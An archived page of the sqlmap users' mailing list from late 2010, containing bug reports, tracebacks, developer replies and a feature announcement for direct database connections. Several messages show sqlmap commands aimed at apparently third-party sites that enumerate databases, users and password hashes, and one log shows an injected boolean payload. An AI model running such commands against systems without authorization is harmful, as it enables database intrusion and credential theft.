sqlmap-users Mailing List for sqlmap (Page 116)
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users — sqlmap users mailing list
You can subscribe to this list here.
| 2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
| 2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
| 2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
| 2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
| 2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
| 2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
| 2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
| 2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
| 2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
| 2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: David G. <sk...@gm...> - 2010-12-01 19:36:10
|
Is there any way to make sqlmap not conduct further tests on the site? (stacked, error, time-based, etc.). The problem is that during the identification of types of sqli allowed, it hangs on a test and terminates the program without allowing me to exploit the flaw. Example: Revision: 2468 $ ./sqlmap.py -u "http://www.vuln.xxx.br/path/vulnphp.php?vulnparam=1766" -p vulnparam --threads 20 --dbs -v 2 sqlmap/0.9-dev - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 17:23:43 [17:23:43] [DEBUG] cleaning up configuration parameters [17:23:43] [DEBUG] setting the HTTP timeout [17:23:43] [DEBUG] setting the HTTP method to GET [17:23:43] [DEBUG] setting the UNION query SQL injection range of columns [17:23:43] [DEBUG] creating HTTP requests opener object [17:23:43] [INFO] using '/home/xxx/sqlmap-dev/output/www.vuln.xxx.br/session' as session file [17:23:43] [INFO] testing connection to the target url [17:23:44] [WARNING] the testable parameter 'vulnparam' you provided is not into the Cookie [17:23:44] [INFO] testing if the url is stable, wait a few seconds [17:23:46] [INFO] url is stable [17:23:49] [INFO] heuristics shows that GET parameter 'vulnparam' might be injectable (possible DBMS: MySQL) [17:23:49] [INFO] testing sql injection on GET parameter 'vulnparam' [17:23:49] [INFO] testing 'AND boolean-based blind - WHERE clause' sqlmap got a 302 redirect to /home/l.php - What target address do you want to use from now on? http://www.vuln.xxx.br:80/path/vulnphp.php (default) or provide another target address based also on the redirection got from the application > [17:23:52] [DEBUG] setting match ratio for current parameter to default value 0.900 [17:23:58] [INFO] GET parameter 'vulnparam' is 'AND boolean-based blind - WHERE clause' injectable [17:23:58] [DEBUG] skipping test 'OR boolean-based blind - WHERE clause' because the risk is higher than the provided [17:23:58] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses' because the level is higher than the provided [17:23:58] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses' because the level is higher than the provided [17:23:58] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause' because the level is higher than the provided [17:23:58] [DEBUG] skipping test 'Oracle boolean-based blind - ORDER BY clause' because the level is higher than the provided [17:23:58] [DEBUG] skipping test 'Generic boolean-based blind - GROUP BY and ORDER BY clauses' because the level is higher than the provided [17:23:58] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses' because the level is higher than the provided [17:23:58] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses' because the level is higher than the provided [17:23:58] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause' because the level is higher than the provided [17:23:58] [DEBUG] skipping test 'Oracle boolean-based blind - ORDER BY clause' because the level is higher than the provided [17:23:58] [DEBUG] skipping test 'Generic boolean-based blind - GROUP BY and ORDER BY clauses' because the level is higher than the provided [17:23:58] [INFO] testing 'MySQL >= 5.0 error-based - WHERE clause' [17:23:59] [INFO] GET parameter 'vulnparam' is 'MySQL >= 5.0 error-based - WHERE clause' injectable [17:24:00] [DEBUG] skipping test 'PostgreSQL error-based - WHERE clause' because the back-end DBMS identified is MySQL [17:24:00] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - WHERE clause' because the back-end DBMS identified is MySQL [17:24:00] [DEBUG] skipping test 'Oracle error-based - WHERE clause' because the back-end DBMS identified is MySQL [17:24:00] [DEBUG] skipping test 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'PostgreSQL error-based - GROUP BY and ORDER BY clauses' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - ORDER BY clause' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'Oracle error-based - ORDER BY clause' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'PostgreSQL error-based - GROUP BY and ORDER BY clauses' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - ORDER BY clause' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'Oracle error-based - ORDER BY clause' because the level is higher than the provided [17:24:00] [INFO] testing 'MySQL > 5.0.11 stacked queries' [17:24:00] [DEBUG] skipping test 'MySQL < 5.0.12 stacked queries' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'PostgreSQL > 8.1 stacked queries' because the back-end DBMS identified is MySQL [17:24:00] [DEBUG] skipping test 'PostgreSQL < 8.2 stacked queries - exists function' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'PostgreSQL < 8.2 stacked queries - Glibc' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'Microsoft SQL Server/Sybase stacked queries' because the back-end DBMS identified is MySQL [17:24:00] [DEBUG] skipping test 'Oracle stacked queries' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'Oracle stacked queries' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'Oracle stacked queries' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'SQLite > 2.0 stacked queries' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'Firebird stacked queries' because the level is higher than the provided [17:24:00] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [17:24:40] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request [17:25:11] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request [17:25:42] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request [17:26:13] [CRITICAL] unable to connect to the target url or proxy [*] shutting down at: 17:26:13 David |
|
From: Miroslav S. <mir...@gm...> - 2010-11-30 18:13:52
|
Hi Jorge. You are using quite outdated version of sqlmap. Please update to our latest development version (0.9/dev) from our repository to have it fixed: svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev Kind regards. On Mon, Nov 29, 2010 at 5:15 PM, Jorge Moya A. <jor...@sy...> wrote: > [13:13:30] [INFO] updating sqlmap > [13:13:32] [ERROR] unhandled exception in sqlmap/0.6.4, please copy the > command line and the following text and send by e-mail to > sql...@li.... The developers will fix it as soon as > possible: > sqlmap version: 0.6.4 > Python version: 2.6.6 > Operating system: linux2 > Traceback (most recent call last): > File "/usr/bin/sqlmap", line 78, in main > init(cmdLineOptions) > File "/usr/share/sqlmap/lib/core/option.py", line 770, in init > update() > File "/usr/share/sqlmap/lib/core/update.py", line 349, in update > __updateSqlmap() > File "/usr/share/sqlmap/lib/core/update.py", line 246, in __updateSqlmap > logger.errMsg(errMsg) > AttributeError: Logger instance has no attribute 'errMsg' > > [*] shutting down at: 13:13:32 > > > ------------------------------------------------------------------------------ > Increase Visibility of Your 3D Game App & Earn a Chance To Win $500! > Tap into the largest installed PC base & get more eyes on your game by > optimizing for Intel(R) Graphics Technology. Get started today with the > Intel(R) Software Partner Program. Five $500 cash prizes are up for grabs. > http://p.sf.net/sfu/intelisp-dev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Jorge M. A. <jor...@sy...> - 2010-11-29 16:32:02
|
[13:13:30] [INFO] updating sqlmap
[13:13:32] [ERROR] unhandled exception in sqlmap/0.6.4, please copy the
command line and the following text and send by e-mail to
sql...@li.... The developers will fix it as soon
as possible:
sqlmap version: 0.6.4
Python version: 2.6.6
Operating system: linux2
Traceback (most recent call last):
File "/usr/bin/sqlmap", line 78, in main
init(cmdLineOptions)
File "/usr/share/sqlmap/lib/core/option.py", line 770, in init
update()
File "/usr/share/sqlmap/lib/core/update.py", line 349, in update
__updateSqlmap()
File "/usr/share/sqlmap/lib/core/update.py", line 246, in
__updateSqlmap
logger.errMsg(errMsg)
AttributeError: Logger instance has no attribute 'errMsg'
[*] shutting down at: 13:13:32
|
|
From: Bernardo D. A. G. <ber...@gm...> - 2010-11-29 09:55:18
|
Can you please svn update and retry? Please, let us know if the problem persists. Thank you, Bernardo On 29 November 2010 06:53, <nig...@em...> wrote: > C:\pentest\sqlmap.0.9>sqlmap -u "http://www.website.com/cikk.php?ID_cikk=11" --current-user --current-db --is-dba --dbs --users --passwords --privileges > [07:42:30] [INFO] testing connection to the target url > [07:42:32] [INFO] testing if the url is stable, wait a few seconds > [07:42:35] [WARNING] url is not stable, sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable p > arameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or reg > ular expression to match on > how do you want to proceed? [C(ontinue)/s(tring)/r(egex)/q(uit)] C > [07:42:45] [INFO] searching for dynamic content > [07:42:46] [INFO] dynamic content marked for removal (8 regions) > [07:42:48] [INFO] testing if GET parameter 'ID_cikk' is dynamic > > [07:42:48] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversio > n repository. If the exception persists, please send by e-mail to sql...@li... the command line, the followi > ng text and any information needed to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get > back to you. > sqlmap version: 0.9-dev > Python version: 2.6.5 > Operating system: nt > Traceback (most recent call last): > File "C:\pentest\sqlmap.0.9\sqlmap.py", line 79, in main > start() > File "C:\pentest\sqlmap.0.9\lib\controller\controller.py", line 335, in start > elif not checkDynParam(place, parameter, value): > File "C:\pentest\sqlmap.0.9\lib\controller\checks.py", line 354, in checkDynParam > payload = agent.payload(place, parameter, value, getUnicode(randInt)) > File "C:\pentest\sqlmap.0.9\lib\core\agent.py", line 75, in payload > retValue = kb.injection.parameter.replace(kb.injection.parameter, > AttributeError: 'NoneType' object has no attribute 'replace' > > [*] shutting down at: 07:42:48 > > ------------------------------------------------------------------------------ > Increase Visibility of Your 3D Game App & Earn a Chance To Win $500! > Tap into the largest installed PC base & get more eyes on your game by > optimizing for Intel(R) Graphics Technology. Get started today with the > Intel(R) Software Partner Program. Five $500 cash prizes are up for grabs. > http://p.sf.net/sfu/intelisp-dev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
|
From: <nig...@em...> - 2010-11-29 06:53:18
|
C:\pentest\sqlmap.0.9>sqlmap -u "http://www.website.com/cikk.php?ID_cikk=11" --current-user --current-db --is-dba --dbs --users --passwords --privileges [07:42:30] [INFO] testing connection to the target url [07:42:32] [INFO] testing if the url is stable, wait a few seconds [07:42:35] [WARNING] url is not stable, sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable p arameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or reg ular expression to match on how do you want to proceed? [C(ontinue)/s(tring)/r(egex)/q(uit)] C [07:42:45] [INFO] searching for dynamic content [07:42:46] [INFO] dynamic content marked for removal (8 regions) [07:42:48] [INFO] testing if GET parameter 'ID_cikk' is dynamic [07:42:48] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversio n repository. If the exception persists, please send by e-mail to sql...@li... the command line, the followi ng text and any information needed to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you. sqlmap version: 0.9-dev Python version: 2.6.5 Operating system: nt Traceback (most recent call last): File "C:\pentest\sqlmap.0.9\sqlmap.py", line 79, in main start() File "C:\pentest\sqlmap.0.9\lib\controller\controller.py", line 335, in start elif not checkDynParam(place, parameter, value): File "C:\pentest\sqlmap.0.9\lib\controller\checks.py", line 354, in checkDynParam payload = agent.payload(place, parameter, value, getUnicode(randInt)) File "C:\pentest\sqlmap.0.9\lib\core\agent.py", line 75, in payload retValue = kb.injection.parameter.replace(kb.injection.parameter, AttributeError: 'NoneType' object has no attribute 'replace' [*] shutting down at: 07:42:48 |
|
From: Carlos G. V. <car...@gm...> - 2010-11-26 18:50:20
|
Thanks! Well, as always, i will be using sqlmap with the new options, and will be reporting any that can help. I'm working in a "progressive use" of N-Markov chains with M-memory. I'm using it with other purpouses, but if i see that it can help, will post it to the list, at least in a theoretically way. KR P.S.: You really think that i have python skills?!?! you must be kidding... ;) 2010/11/19 Miroslav Stampar <mir...@gm...>: > hi Carlos once again. > > as said, i've read your code, and can say that's it's a cool thingy. > but, as said --predict-output already makes the job really good. > > nevertheless, i'll have this one on my mind and incorporate it if > it'll be helpful in some other situation. > > kr > > p.s. good python skills ;) > > On Wed, Nov 17, 2010 at 4:34 PM, Miroslav Stampar > <mir...@gm...> wrote: >> hi. >> >> i'll join Bernardo and say that --predict-output should do the same >> job. nevertheless will research your code and report. >> >> kr >> >> On Wed, Nov 17, 2010 at 4:14 PM, Bernardo Damele A. G. >> <ber...@gm...> wrote: >>> You spoiled one of the shiny features of sqlmap 0.9-dev that we will >>> be talking about during the next weeks ;) >>> It has been implemented about since 5 months or so, give it a try >>> yourself with --predict-output and enjoy. >>> >>> Bernardo >>> >>> >>> On 17 November 2010 14:57, Carlos Gabriel Vergara >>> <car...@gm...> wrote: >>>> Hi to all. >>>> >>>> Before all, i want to mention that i been working with the repository >>>> version of sqlmap (0.9) and it's awsome. >>>> >>>> I want to propose something crazy: Markov chains. >>>> (http://en.wikipedia.org/wiki/Markov_chain) >>>> Keeping it simple: a Markov chain is a tool that works on predictive >>>> events. It works with events, generating a "chain" (a list) of wich >>>> event is going to happen if certain events has already happen. >>>> When using sqlmap, let's say, when enumerating users, if at the middle >>>> of the process we see that the user is "roo", it's obvious that the >>>> last char will be a "t". If a table name is "aucti", the rest will be >>>> "on". If we see the "events" of the Markov chain as the probability of >>>> find one char knowing the predecessor chars, it could be used in >>>> sqlmap, at least to "try" the more often char for the previous >>>> combination, based on a dictionary of words (common users, tables, >>>> structures, values, etc). >>>> Another capability of Markov chain is that it has "memory"; in case of >>>> char prediction, the memory specifies how much chars it will be >>>> "looking back" when predicting the next. >>>> >>>> I have code a sample in python that shows the process in a very fool >>>> example. It's a tool that takes a dictionary as input, a "memory size" >>>> (default 2 chars back), and generates a random text based on this >>>> chain. The result will be random text similar to the language used in >>>> the dictionary. >>>> >>>> In sqlmap, the chain could be used to test the next "more probably" >>>> character for the partially guessed string based on a dictionary of >>>> common words. >>>> >>>> For example: the script was used on a dict file generated using >>>> "sqlmap --help > testdict.txt", with this output: >>>> >>>> $ ./markov_chain.py -d testdict.txt -m 4 >>>> sqlmap/0.8 - authe cookie header --ver takeover own SQL injection >>>> INI file click processions can behaviour or stack-end DBMS database >>>> gentry key value=RFILE -c CONFIGFILE Write DBMS current >>>> Last from retrinter(s) ratingerpreteration cert=ACERT First or >>>> structure affection (defaults (default 1) >>>> >>>> Look that "randomly" generated text using the chain is very very >>>> similar to the english speaking. >>>> >>>> I'm attaching the source to the mail. >>>> >>>> Hope it can help! >>>> >>>> Best regards, >>>> >>>> >>>> -- >>>> --------8<-------- >>>> Carlos Gabriel Vergara >>>> http://www.ThorSecurity.com.ar >>>> >>>> PGP: http://www.ThorSecurity.com.ar/gabrielvergara.pgp >>>> -------->8-------- >>>> >>>> ------------------------------------------------------------------------------ >>>> Beautiful is writing same markup. Internet Explorer 9 supports >>>> standards for HTML5, CSS3, SVG 1.1, ECMAScript5, and DOM L2 & L3. >>>> Spend less time writing and rewriting code and more time creating great >>>> experiences on the web. Be a part of the beta today >>>> http://p.sf.net/sfu/msIE9-sfdev2dev >>>> _______________________________________________ >>>> sqlmap-users mailing list >>>> sql...@li... >>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>> >>>> >>> >>> >>> >>> -- >>> Bernardo Damele A. G. >>> >>> E-mail / Jabber: bernardo.damele (at) gmail.com >>> Mobile: +447788962949 (UK 07788962949) >>> PGP Key ID: 0x05F5A30F >>> >>> ------------------------------------------------------------------------------ >>> Beautiful is writing same markup. Internet Explorer 9 supports >>> standards for HTML5, CSS3, SVG 1.1, ECMAScript5, and DOM L2 & L3. >>> Spend less time writing and rewriting code and more time creating great >>> experiences on the web. Be a part of the beta today >>> http://p.sf.net/sfu/msIE9-sfdev2dev >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >> >> >> >> -- >> Miroslav Stampar >> >> E-mail / Jabber: miroslav.stampar (at) gmail.com >> Mobile: +385921010204 (HR 0921010204) >> PGP Key ID: 0xB5397B1B >> Location: Zagreb, Croatia >> > > > > -- > Miroslav Stampar > > E-mail / Jabber: miroslav.stampar (at) gmail.com > Mobile: +385921010204 (HR 0921010204) > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > -- --------8<-------- Carlos Gabriel Vergara http://www.ThorSecurity.com.ar PGP: http://www.ThorSecurity.com.ar/gabrielvergara.pgp -------->8-------- |
|
From: Bernardo D. A. G. <ber...@gm...> - 2010-11-24 15:12:22
|
Hi,
As we announced last week, let's kick off with the posts about sqlmap
shiny new features that will culminate with the release of version 0.9
in early 2011!
Feature: direct connection to a database management system
Switch involved: -d
Generic syntax: DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME
Samples syntax: python sqlmap.py -d
mysql://root:testpass@192.168.136.131:3306/mysql -v 2
This feature has been around since May or so, I have even presented it
during my speech at AthCon[1] back in June.
So far sqlmap has been yet another sql injection tool, used by web
application penetration testers/newbies/curious teens/computer
addicted/punks and so on. Things move on and as they evolve, we do as
well. Now it supports this new switch, -d, that allows you to connect
from your machine to the database server's TCP port where the DBMS
instance is listening on given valid credentials, IP address, TCP port
and database name.
All in all, now it can also be handy at first sight during
infrastructure assessments: You can use sqlmap to attack database
servers either by leveraging SQL injections vulnerabilities in web
application or by connecting directly to the database given valid
credentials. All of the fingerprint, enumeration and takeover
functionalities stand and work in both scenarios. If they don't,
there's a bug and you're gently encouraged to report.
It relies on Python bindings for MySQL protocol, PostgreSQL protocol
and so on and the code has been implemented in
plugins/dbms/*/connector.py files. Other modifications have been
applied here and there in lib/ subfolders to make the switch work too.
Let's make an example:
--8<--
$ python sqlmap.py -d mysql://root:testpass@192.168.136.131:3306/mysql
-v 2 --dbs
sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 15:11:38
[15:11:38] [DEBUG] cleaning up configuration parameters
[15:11:38] [INFO] using
'/home/inquis/software/sqlmap/subversion/trunk/sqlmap/output/192.168.136.131/session'
as session file
[15:11:38] [DEBUG] forcing timeout to 10 seconds
[15:11:38] [INFO] connection to mysql server 192.168.136.131:3306 established
[15:11:38] [INFO] testing MySQL
[15:11:38] [DEBUG] query: SELECT CONNECTION_ID()=CONNECTION_ID()
[15:11:38] [INFO] confirming MySQL
[15:11:38] [DEBUG] query: SELECT ISNULL(1/0)
[15:11:38] [DEBUG] query: SELECT 0 FROM information_schema.TABLES LIMIT 0, 1
[15:11:38] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[15:11:38] [INFO] fetching database names
[15:11:38] [DEBUG] query: SELECT schema_name FROM
information_schema.SCHEMATA ORDER BY 1
available databases [3]:
[*] mysql
[*] testdb
[*] information_schema
[15:11:38] [INFO] connection to mysql server 192.168.136.131:3306 closed
[*] shutting down at: 15:11:38
--8<--
And another one:
--8<--
$ python sqlmap.py -d
oracle://SYS:testpass@192.168.136.131:1521/testdb -v 1 --users
sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 15:06:08
[15:06:08] [INFO] using
'/home/inquis/software/sqlmap/subversion/trunk/sqlmap/output/192.168.136.131/session'
as session file
[15:06:08] [INFO] successfully connected as SYSDBA
[15:06:08] [INFO] connection to oracle server 192.168.136.131:1521 established
[15:06:08] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[15:06:08] [INFO] fetching database users
database management system users [21]:
[*] MDDATA
[*] MGMT_VIEW
[*] ANONYMOUS
[*] DIP
[*] SYS
[*] SI_INFORMTN_SCHEMA
[*] CTXSYS
[*] OUTLN
[*] TSMSYS
[*] DBSNMP
[*] WMSYS
[*] SYSMAN
[*] OLAPSYS
[*] XDB
[*] EXFSYS
[*] ORDPLUGINS
[*] DMSYS
[*] SCOTT
[*] MDSYS
[*] SYSTEM
[*] ORDSYS
[15:06:09] [INFO] connection to oracle server 192.168.136.131:1521 closed
[*] shutting down at: 15:06:09
--8<--
[1] http://bernardodamele.blogspot.com/2010/06/got-database-access-own-network.html
Cheers,
--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
|
|
From: Miroslav S. <mir...@gm...> - 2010-11-19 22:00:30
|
hi Carlos once again. as said, i've read your code, and can say that's it's a cool thingy. but, as said --predict-output already makes the job really good. nevertheless, i'll have this one on my mind and incorporate it if it'll be helpful in some other situation. kr p.s. good python skills ;) On Wed, Nov 17, 2010 at 4:34 PM, Miroslav Stampar <mir...@gm...> wrote: > hi. > > i'll join Bernardo and say that --predict-output should do the same > job. nevertheless will research your code and report. > > kr > > On Wed, Nov 17, 2010 at 4:14 PM, Bernardo Damele A. G. > <ber...@gm...> wrote: >> You spoiled one of the shiny features of sqlmap 0.9-dev that we will >> be talking about during the next weeks ;) >> It has been implemented about since 5 months or so, give it a try >> yourself with --predict-output and enjoy. >> >> Bernardo >> >> >> On 17 November 2010 14:57, Carlos Gabriel Vergara >> <car...@gm...> wrote: >>> Hi to all. >>> >>> Before all, i want to mention that i been working with the repository >>> version of sqlmap (0.9) and it's awsome. >>> >>> I want to propose something crazy: Markov chains. >>> (http://en.wikipedia.org/wiki/Markov_chain) >>> Keeping it simple: a Markov chain is a tool that works on predictive >>> events. It works with events, generating a "chain" (a list) of wich >>> event is going to happen if certain events has already happen. >>> When using sqlmap, let's say, when enumerating users, if at the middle >>> of the process we see that the user is "roo", it's obvious that the >>> last char will be a "t". If a table name is "aucti", the rest will be >>> "on". If we see the "events" of the Markov chain as the probability of >>> find one char knowing the predecessor chars, it could be used in >>> sqlmap, at least to "try" the more often char for the previous >>> combination, based on a dictionary of words (common users, tables, >>> structures, values, etc). >>> Another capability of Markov chain is that it has "memory"; in case of >>> char prediction, the memory specifies how much chars it will be >>> "looking back" when predicting the next. >>> >>> I have code a sample in python that shows the process in a very fool >>> example. It's a tool that takes a dictionary as input, a "memory size" >>> (default 2 chars back), and generates a random text based on this >>> chain. The result will be random text similar to the language used in >>> the dictionary. >>> >>> In sqlmap, the chain could be used to test the next "more probably" >>> character for the partially guessed string based on a dictionary of >>> common words. >>> >>> For example: the script was used on a dict file generated using >>> "sqlmap --help > testdict.txt", with this output: >>> >>> $ ./markov_chain.py -d testdict.txt -m 4 >>> sqlmap/0.8 - authe cookie header --ver takeover own SQL injection >>> INI file click processions can behaviour or stack-end DBMS database >>> gentry key value=RFILE -c CONFIGFILE Write DBMS current >>> Last from retrinter(s) ratingerpreteration cert=ACERT First or >>> structure affection (defaults (default 1) >>> >>> Look that "randomly" generated text using the chain is very very >>> similar to the english speaking. >>> >>> I'm attaching the source to the mail. >>> >>> Hope it can help! >>> >>> Best regards, >>> >>> >>> -- >>> --------8<-------- >>> Carlos Gabriel Vergara >>> http://www.ThorSecurity.com.ar >>> >>> PGP: http://www.ThorSecurity.com.ar/gabrielvergara.pgp >>> -------->8-------- >>> >>> ------------------------------------------------------------------------------ >>> Beautiful is writing same markup. Internet Explorer 9 supports >>> standards for HTML5, CSS3, SVG 1.1, ECMAScript5, and DOM L2 & L3. >>> Spend less time writing and rewriting code and more time creating great >>> experiences on the web. Be a part of the beta today >>> http://p.sf.net/sfu/msIE9-sfdev2dev >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >> >> >> >> -- >> Bernardo Damele A. G. >> >> E-mail / Jabber: bernardo.damele (at) gmail.com >> Mobile: +447788962949 (UK 07788962949) >> PGP Key ID: 0x05F5A30F >> >> ------------------------------------------------------------------------------ >> Beautiful is writing same markup. Internet Explorer 9 supports >> standards for HTML5, CSS3, SVG 1.1, ECMAScript5, and DOM L2 & L3. >> Spend less time writing and rewriting code and more time creating great >> experiences on the web. Be a part of the beta today >> http://p.sf.net/sfu/msIE9-sfdev2dev >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > Miroslav Stampar > > E-mail / Jabber: miroslav.stampar (at) gmail.com > Mobile: +385921010204 (HR 0921010204) > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Miroslav S. <mir...@gm...> - 2010-11-19 21:44:48
|
hi. could you please be so kind, update to the latest development version and try it again? there was a problem with sqlmap's google searching part reported 6 hours ago by one another user (ToR), caused by a new regular expression used, but i hope that it should be solved in the latest commit. nevertheless, all of you which'll spot any problems with parsing of google results, please report the "dork" used and i'll try to act accordingly. kr On Fri, Nov 19, 2010 at 9:57 PM, Jair Sandoval C. < esa...@se...> wrote: > Hi there. > The coomand used, is: > sqlmap# ./sqlmap.py --dump-all -g "site:congreso.seguridad.unam.mx" > > and the output: > sqlmap version: 0.9-dev > Python version: 2.6.2 > Operating system: posix > Traceback (most recent call last): > File "./sqlmap.py", line 82, in main > start() > File "/usr/bin/samurai/sqlmap/lib/controller/controller.py", line 226, in > start > injType = checkSqlInjection(place, parameter, value, parenthesis) > File "/usr/bin/samurai/sqlmap/lib/controller/checks.py", line 75, in > checkSqlInjection > trueResult = Request.queryPage(payload, place) > File "/usr/bin/samurai/sqlmap/lib/request/connect.py", line 338, in > queryPage > page, headers = Connect.getPage(url=uri, get=get, post=post, > cookie=cookie, ua=ua, silent=silent, method=method, auxHeaders=auxHeaders, > response=response, raise404=raise404) > File "/usr/bin/samurai/sqlmap/lib/request/connect.py", line 164, in > getPage > conn = urllib2.urlopen(req) > File "/usr/lib/python2.6/urllib2.py", line 124, in urlopen > return _opener.open(url, data, timeout) > File "/usr/lib/python2.6/urllib2.py", line 375, in open > protocol = req.get_type() > File "/usr/lib/python2.6/urllib2.py", line 241, in get_type > raise ValueError, "unknown url type: %s" % self.__original > ValueError: unknown url type: > default?appex=Zamboni&idioma=es&nomex=Diego%20AND%204155=4155 > > > I wished could be helpful. Bye. > > > -- > *Edgar Jair Sandoval C.* *D*epartamento de *A*uditoría y *N*uevas *T > *ecnologías *S*ubdirección de *S*eguridad de la *I*nformación / * > UNAM-CERT* Correo: esandoval AT seguridad DOT unam DOT mx Teléfono: 56 > 22 81 69 > > > ------------------------------------------------------------------------------ > Beautiful is writing same markup. Internet Explorer 9 supports > standards for HTML5, CSS3, SVG 1.1, ECMAScript5, and 